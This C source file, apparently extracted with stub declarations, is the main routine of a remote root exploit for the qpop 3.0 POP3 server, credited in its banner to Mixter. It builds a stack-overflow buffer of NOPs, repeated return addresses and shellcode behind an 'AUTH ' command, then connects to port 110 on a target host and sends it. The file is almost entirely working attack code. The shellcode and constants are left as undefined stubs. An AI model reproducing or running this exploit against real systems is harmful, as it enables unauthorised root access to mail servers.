
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;


 int AF_INET ;
 int CODESTART ;
 int LEN ;
 char NOP ;
 long RET ;
 int SOCK_STREAM ;
 long atoi (char*) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int errno ;
 int exit (int ) ;
 int fflush (int ) ;
 int fprintf (int ,char*,char*) ;
 int get_sp () ;
 int htons (int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int resolve (char*) ;
 char* shellcode ;
 int socket (int ,int ,int ) ;
 int stderr ;
 char* strerror (int ) ;
 int strlen (char*) ;
 int term (int,int ) ;
 int write (int,char*,int) ;

int

main (int argc, char **argv)

{

  char buffer[LEN];

  char *codeptr = shellcode;

  long retaddr = RET;

  int i, s;

  struct sockaddr_in sin;



  if (argc < 2)

    {

      printf ("usage: %s <host> [offset]\n", argv[0]);

      printf ("use offset -1 to try local esp\n");

      exit (0);

    }



  if (argc > 2)

    {

      if (atoi (argv[2]) == -1)

 {





   retaddr = get_sp () - 8000 - LEN;

   printf ("Using local esp as ret address...\n");

 }

      retaddr += atoi (argv[2]);

    }



  for (i = 0; i < LEN; i++)

    *(buffer + i) = NOP;



  for (i = CODESTART + 2; i < LEN; i += 4)

    *(int *) &buffer[i] = retaddr;



  for (i = CODESTART; i < CODESTART + strlen (shellcode); i++)

    *(buffer + i) = *(codeptr++);



  buffer[0] = 'A';

  buffer[1] = 'U';

  buffer[2] = 'T';

  buffer[3] = 'H';

  buffer[4] = ' ';



  printf ("qpop 3.0 remote root exploit (linux) by Mixter\n");

  printf ("[return address: 0x%lx buffer size: %d code size: %d]\n",

   retaddr, strlen (buffer), strlen (shellcode));



  fflush (0);



  sin.sin_family = AF_INET;

  sin.sin_port = htons (110);

  sin.sin_addr.s_addr = resolve (argv[1]);

  s = socket (AF_INET, SOCK_STREAM, 0);



  if (connect (s, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0)

    {

      perror ("connect");

      exit (0);

    }



  switch (write (s, buffer, strlen (buffer)))

    {

    case 0:

    case -1:

      fprintf (stderr, "write error: %s\n", strerror (errno));

      break;

    default:

      break;

    }

  write (s, "\n\n", 1);

  term (s, 0);



  return 0;

}
